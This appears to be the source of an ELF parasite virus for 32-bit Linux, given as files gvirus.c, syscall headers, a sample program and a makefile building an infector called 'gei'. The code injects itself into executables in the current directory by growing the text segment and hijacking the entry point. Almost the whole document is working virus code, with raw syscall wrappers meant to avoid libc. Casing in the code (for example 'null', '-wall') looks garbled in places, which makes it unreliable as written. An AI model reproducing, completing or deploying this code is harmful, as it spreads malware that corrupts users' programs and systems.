static inline int infect_virus(
const char *file,
void *v_code,
unsigned int v_code_size,
unsigned long v_retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
elf32_ehdr *ehdr = null;
elf32_phdr *phdr;
elf32_shdr *shdr;
int i;
int txt_index;
struct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_v_code[page_size];
char tmpfile[32] = {"/","t","m","p","/",".","g","v","i","r","u","s","\0"};
#ifndef ndebug
char err_type[32] = {"f","i","l","e"," ","t","y","p","e"," ","n","o","t"," ",
"s","u","p","p","o","r","t","e","d","\n","\0"};
char luck[32] = {"b","e","t","t","e","r"," ","l","u","c","k"," ",
"n","e","x","t"," ","f","i","l","e","\n","\0"};
#endif
fd = g_open(file, o_rdwr, 0);
if (fd == -1) {
goto err;
}
if (g_fstat(fd, &stat) == -1) {
goto err;
}
ehdr = g_mmap2(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
v_debug_write(1, &err_type, sizeof(err_type));
goto err;
}
align_code_size = page_align(v_code_size);
/* get program header and section header start address */
phdr = (elf32_phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (elf32_shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;
if (phdr[txt_index].p_type == pt_load
&& phdr[txt_index].p_flags == (pf_r|pf_x)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
v_debug_write(1, &luck, sizeof(luck));
goto err;
}
break;
}
txt_index++;
}
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}
/* increase p_shoff in the elf header */
ehdr->e_shoff += align_code_size;
/* make a new file */
tmp_fd = g_open(tmpfile, o_wronly|o_creat|o_trunc, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}
size = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;
__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}
g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);
if (g_rename(tmpfile, file) == -1) {
goto err;
}
return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}
static inline void virus_code(void)
{
char dirdata[4096];
struct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
char curdir[2] = {".", 0};
char newline = "\n";
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
if ((curfd = g_open(curdir, o_rdonly, 0)) < 0)
goto out;
/* get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
/* infecting */
while ((nbyte = g_getdents(curfd, (struct dirent *)
&dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
v_debug_write(1, dirp->d_name, dirp->d_reclen - (unsigned long)
&(((struct dirent *) 0)->d_name));
v_debug_write(1, &newline, sizeof(newline));
infect_virus(dirp->d_name,
(void *) para_code_start_addr,
paracode_length,
paracode_retaddr_addr_offset);
c += dirp->d_reclen;
if (c >= nbyte)
break;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
}
void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------
------------------------------ gunistd.h ------------------------------
#ifndef _g2_unistd_
#define _g2_unistd_
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name)); \
g__syscall_return(type,__res); \
}
#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}
#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4))); \
g__syscall_return(type,__res); \
}
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4)),"d" ((long)(arg5))); \
g__syscall_return(type,__res); \
}
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4)),"d" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}
#endif /* _g2_unistd_ */
------------------------------ gunistd.h ------------------------------
------------------------------ gsyscall.h ------------------------------
#ifndef _g2_syscall_
#define _g2_syscall_
#include <sys/types.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <linux/fcntl.h>
#include "gunistd.h"
#define null 0
struct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* we must not include limits.h! */
};
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline g_syscall1(int, close, int, fd);
static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
static inline g_syscall2(int, munmap, void *, addr, size_t, len);
static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);
static inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&d" (d1), "=&s" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
#endif /* _g2_syscall_ */
------------------------------ gsyscall.h ------------------------------
------------------------------ foo.c ------------------------------
#include <stdio.h>
int main()
{
puts("real elf point");
return 0;
}
------------------------------ foo.c ------------------------------
------------------------------ makefile ------------------------------
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -o2 $< gvirus.o -o gei -wall -dndebug
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -o2 -c -o gvirus.o -fomit-frame-pointer -wall -dndebug
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
------------------------------ makefile ------------------------------